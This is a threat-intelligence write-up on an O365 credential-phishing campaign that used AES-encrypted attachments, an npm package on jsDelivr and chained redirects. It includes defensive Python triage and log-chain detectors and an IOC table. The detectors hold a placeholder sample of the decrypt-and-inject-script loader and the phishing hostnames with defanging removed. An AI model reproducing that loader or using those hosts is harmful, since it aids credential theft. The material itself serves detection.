Fortra’s Suspicious Email Analysis (SEA) team uncovered a highly sophisticated phishing campaign targeting Microsoft O365 users, marking a significant escalation in the technical complexity of credential harvesting threats.
While phishing attacks are a persistent issue, this campaign distinguishes itself by combining several modern technologies in tandem, including Advanced Encryption Standard (AES) encryption, malicious npm (Node Package Manager) packages, and abuse of reputable Content Delivery Networks (CDNs).
This coordinated use of advanced obfuscation, supply chain compromise, and cloud-native redirection mechanisms highlights a new evolution in attack strategies against enterprise users.
The campaign begins with a phishing email carrying a benign-looking .htm attachment, “EFT-PMT.htm.”

Upon inspection, investigators found that the file concealed its payload using AES encryption, an unusual step in phishing kits, where simpler JavaScript obfuscation is the norm.
The encrypted string, when decrypted, revealed a JavaScript file hosted on jsDelivr, a widely used CDN for distributing open-source npm packages.
This hosting choice not only lends legitimacy to the attack but also increases the difficulty of detection and remediation.
The referenced JavaScript file belonged to the npm package [email protected], masquerading as a legitimate software library accessible via standard CDN pathways (https://cdn.jsdelivr.net/npm/[email protected]/MOMENTUM/NOW.API.JS).
Post-execution, this script dynamically constructs phishing links personalized with the victim’s email address, redirecting users into a carefully crafted Office 365 login mimic. Credentials entered here are harvested by the adversaries.
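The attachment behaviour described above (client-side AES decryption whose plaintext is a jsDelivr npm URL, then dynamic script loading) can be triaged statically, without executing any JavaScript. The following script is an added example written for this article; it is not Fortra's tooling or code from the campaign. It flags the `CryptoJS.AES.decrypt(...)` call, the base64 `Salted__` header that CryptoJS passphrase-mode AES output starts with, dynamic script injection, and any plaintext `cdn.jsdelivr.net/npm/<package>@<version>/...` references (plain or `hxxps`-defanged, so IOC tables can be fed through the same regex). The sample attachments, the ciphertext and the package name `EXAMPLE-PKG` are constructed placeholders; the real package name is not reproduced in the report text.

```python
import re
from dataclasses import dataclass

# Patterns derived from the attachment behaviour the report describes.
CDN_NPM_URL = re.compile(
    r"h(?:tt|xx)ps?://cdn\.jsdelivr\.net/npm/"          # plain or defanged scheme
    r"(?P<pkg>@?[\w.-]+(?:/[\w.-]+)?)@(?P<ver>[\w.-]+)"  # package@version (scoped or not)
    r"(?P<path>/[^\s\"'<>)]*)?",                         # file path inside the package
    re.IGNORECASE,
)
AES_DECRYPT = re.compile(r"CryptoJS\s*\.\s*AES\s*\.\s*decrypt\s*\(")
# CryptoJS passphrase-mode AES emits OpenSSL "Salted__" format; the base64 of that
# header always begins with "U2FsdGVkX1".
SALTED_BLOB = re.compile(r"U2FsdGVkX1[0-9A-Za-z+/=]{16,}")
DYNAMIC_LOAD = re.compile(
    r"createElement\s*\(\s*[\"']script[\"']\s*\)|\beval\s*\(|new\s+Function\s*\(|document\.write\s*\("
)


@dataclass
class Triage:
    aes_decrypt: bool
    salted_blob: bool
    dynamic_load: bool
    cdn_packages: list  # (package, version, path) for every plaintext jsDelivr npm URL

    @property
    def verdict(self) -> str:
        # Client-side AES decryption feeding a dynamic script load (or sitting next to
        # an OpenSSL-style ciphertext blob) is the shape this campaign's attachment took.
        if self.aes_decrypt and (self.dynamic_load or self.salted_blob):
            return "high"
        if self.aes_decrypt or self.salted_blob or self.cdn_packages:
            return "medium"
        return "low"


def triage_attachment(html_text: str) -> Triage:
    """Static triage of an .htm/.html mail attachment; nothing is executed."""
    return Triage(
        aes_decrypt=bool(AES_DECRYPT.search(html_text)),
        salted_blob=bool(SALTED_BLOB.search(html_text)),
        dynamic_load=bool(DYNAMIC_LOAD.search(html_text)),
        cdn_packages=[(m["pkg"], m["ver"], m["path"] or "")
                      for m in CDN_NPM_URL.finditer(html_text)],
    )


# Constructed samples (not the real attachment). Ciphertext and package name are placeholders.
SAMPLE_ENCRYPTED = """<html><body><p>Payment advice attached.</p>
<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js"></script>
<script>
var c = "U2FsdGVkX19PLACEHOLDERNOTREALCIPHERTEXT0000000000";
var u = CryptoJS.AES.decrypt(c, "k").toString(CryptoJS.enc.Utf8);  // plaintext is a CDN URL
var s = document.createElement("script"); s.src = u; document.head.appendChild(s);
</script></body></html>"""

SAMPLE_PLAINTEXT = """<html><body>
<script src="https://cdn.jsdelivr.net/npm/EXAMPLE-PKG@2.1.9/MOMENTUM/NOW.API.JS"></script>
</body></html>"""

SAMPLE_BENIGN = """<html><body><h1>Remittance advice</h1>
<table><tr><td>Invoice</td><td>INV-0001</td></tr></table></body></html>"""

if __name__ == "__main__":
    for name, doc in [("encrypted", SAMPLE_ENCRYPTED), ("plaintext", SAMPLE_PLAINTEXT), ("benign", SAMPLE_BENIGN)]:
        t = triage_attachment(doc)
        print(f"{name:9s} verdict={t.verdict:6s} aes={t.aes_decrypt} blob={t.salted_blob} "
              f"dyn={t.dynamic_load} cdn={t.cdn_packages}")
```

The encrypted sample scores "high" even though no CDN URL is visible in it, which is the point: the URL only exists after decryption in the victim's browser, so the presence of the decryption scaffolding itself is the signal a mail gateway can act on. The plaintext sample shows the extractor pulling package, version and file path from an unencrypted variant so the package can be looked up on the registry and blocked at the proxy.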
Exploiting Development Infrastructure
npm is a cornerstone of the JavaScript ecosystem, allowing rapid code reuse by developers.
Malicious actors have long exploited open-source repositories for malware distribution and supply chain attacks, but leveraging them as infrastructure to serve live phishing payloads introduces new risks.
CDNs like jsDelivr further amplify this risk, as their global distribution and trusted reputation can thwart security controls and lend legitimacy to malicious assets.
According to the report, Fortra’s analysis traced the payloads through both live CDN links and downloaded npm packages.
Even after CDN takedowns, the malicious packages could be installed locally via npm install [email protected], opening the “MOMENTUM” directory and the critical NOW.API.JS script.
This script not only facilitated redirection but embedded technical artifacts (e.g., the victim’s email) directly into the attack flow, increasing the effectiveness of credential harvesting.
O365 Phish Pages
A defining characteristic of this campaign is the use of chained, multi-stage redirection.
Malicious URLs embedded in the JavaScript payload (such as those under natrium100gram.site and various pages.dev domains) were confirmed to host or point toward active phishing infrastructure, ultimately leading to fake Office 365 login portals indistinguishable from legitimate authentication pages.
Cloudflare and other infrastructure providers have responded by blocking known malicious endpoints, but attackers have adapted with new package versions (e.g., [email protected]) and fresh phishing URLs.

Malware sandboxes like Any.Run captured the final phishing sites before takedown, demonstrating the adversaries’ intent: harvesting enterprise credentials at scale using dynamic, infrastructure-as-code principles.
This campaign underscores an alarming trend: attackers are integrating advanced cryptography, supply chain infiltration, and cloud-native delivery into phishing operations.
By chaining together AES-encrypted payloads, npm-based code execution, and trusted CDNs, adversaries can evade detection and rapidly adapt to countermeasures.
Organizations must escalate their security posture, including continuous monitoring of developer dependencies, defense against encrypted payloads, and vigilant tracking of redirection patterns in emails and cloud services.
As attacker sophistication accelerates, defenders should expect further convergence of supply chain compromise and phishing, necessitating robust, contextual threat intelligence.
IOCs Table
Indicator | Type | Description / Notes |
---|---|---|
5d33bd347d0525731c375048f8cb228cb6ab54bbf883fbc9a862e457a4137653 | SHA256 | EFT-PMT.htm malicious attachment |
hxxps://cdn.jsdelivr.net/npm/[email protected]/MOMENTUM/NOW.API.JS | URL | Malicious npm package payload hosted on jsDelivr CDN |
hxxps://natrium100gram.site/public/api/page/redirect | URL | Redirection endpoint for further phishing |
hxxps://adobe-pending-sign-7834892393293.pages.dev/#?refid= | URL | Redirection/fake Office 365 landing page |
35ff658910c0da186ef710711aa1c774756bc6e2855d7783bb2ff0a36edf0308 | SHA256 | NOW.API.JS (version 2.1.9) |
hxxps://noirlegacy-panel-1.website/uuurrlll | URL | Updated phishing redirect (version 2.1.10) |
hxxps://sun-shine.pages.dev/#?refid= | URL | Alternate redirection (version 2.1.10) |
8f02b3108099ae84d5c242b5ba061abf04034c893d5841ed8492f3637e57043d | SHA256 | NOW.API.JS (version 2.1.10) |
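The multi-stage redirection described in the O365 Phish Pages section, and the “vigilant tracking of redirection patterns” the article recommends, can be turned into a concrete proxy-log check. The script below is an added example written for this article, not Fortra's tooling; it assumes a simple `timestamp client url referer` log format and uses the hostnames from the IOC table above (restored from their defanged `hxxps` form). It reports direct IOC hits and, per client, a versioned jsDelivr npm fetch followed within a short window by requests to IOC hosts or any `*.pages.dev` host. The log lines are constructed, and `EXAMPLE-PKG` stands in for the real package name, which the report text does not reproduce.

```python
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Hostnames from the IOC table above, restored from their defanged form.
IOC_HOSTS = {
    "natrium100gram.site",
    "adobe-pending-sign-7834892393293.pages.dev",
    "noirlegacy-panel-1.website",
    "sun-shine.pages.dev",
}


def host_of(url: str) -> str:
    return urlsplit(url).netloc.lower()


def is_cdn_npm_fetch(url: str) -> bool:
    # A versioned npm asset served by jsDelivr: cdn.jsdelivr.net/npm/<pkg>@<ver>/...
    u = urlsplit(url)
    return u.netloc.lower() == "cdn.jsdelivr.net" and u.path.startswith("/npm/") and "@" in u.path


def parse_log(text: str):
    """Parse the assumed 'timestamp client url referer' format into time-sorted tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, url, referer = line.split()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), client, url, referer))
    return sorted(events)


def ioc_hits(events):
    """Direct matches against the published IOC hosts."""
    return [ev for ev in events if host_of(ev[2]) in IOC_HOSTS]


def find_chains(events, window=timedelta(seconds=120)):
    """Per client: a versioned jsDelivr npm fetch followed, within `window`, by
    requests to IOC hosts or to any *.pages.dev host.

    The '#?refid=' suffix in the IOC table (assumed here to carry the victim email the
    report says the links are personalised with) is a URL fragment. Browsers never send
    fragments to the server or proxy, so it cannot be matched from this log; only the
    hosts and their ordering are visible here. Browser or EDR telemetry would be needed
    to observe the fragment itself.
    """
    by_client = {}
    for ev in events:
        by_client.setdefault(ev[1], []).append(ev)
    chains = []
    for client, evs in by_client.items():
        for i, (t0, _, url0, _) in enumerate(evs):
            if not is_cdn_npm_fetch(url0):
                continue
            follow = []
            for t1, _, url1, _ in evs[i + 1:]:
                if t1 - t0 > window:
                    break
                h = host_of(url1)
                if h in IOC_HOSTS or h.endswith(".pages.dev"):
                    follow.append(url1)
            if follow:
                chains.append({"client": client, "cdn_url": url0, "chain": follow})
    return chains


# Constructed log lines, not from the report. The second client is a benign control:
# a normal jQuery fetch and an unrelated pages.dev site hours later.
SAMPLE_LOG = """\
2025-08-01T09:00:01Z 10.0.0.7 https://cdn.jsdelivr.net/npm/EXAMPLE-PKG@2.1.9/MOMENTUM/NOW.API.JS -
2025-08-01T09:00:03Z 10.0.0.7 https://natrium100gram.site/public/api/page/redirect -
2025-08-01T09:00:04Z 10.0.0.7 https://adobe-pending-sign-7834892393293.pages.dev/ https://natrium100gram.site/
2025-08-01T09:05:00Z 10.0.0.9 https://cdn.jsdelivr.net/npm/jquery@3.7.1/dist/jquery.min.js https://intranet.example/
2025-08-01T11:30:00Z 10.0.0.9 https://docs.example.pages.dev/ -
"""

if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    for c in find_chains(evs):
        print(f"{c['client']}: {c['cdn_url']} -> {' -> '.join(c['chain'])}")
    print(len(ioc_hits(evs)), "direct IOC hits")
```

The sequence rule is what keeps the check useful after the next package version and set of domains replace the ones in the table: jsDelivr serving a versioned npm asset is routine on its own, and a `pages.dev` site is routine on its own, but one followed by the other within seconds, from a client that was reading mail, is the shape of this campaign rather than of a developer's browsing.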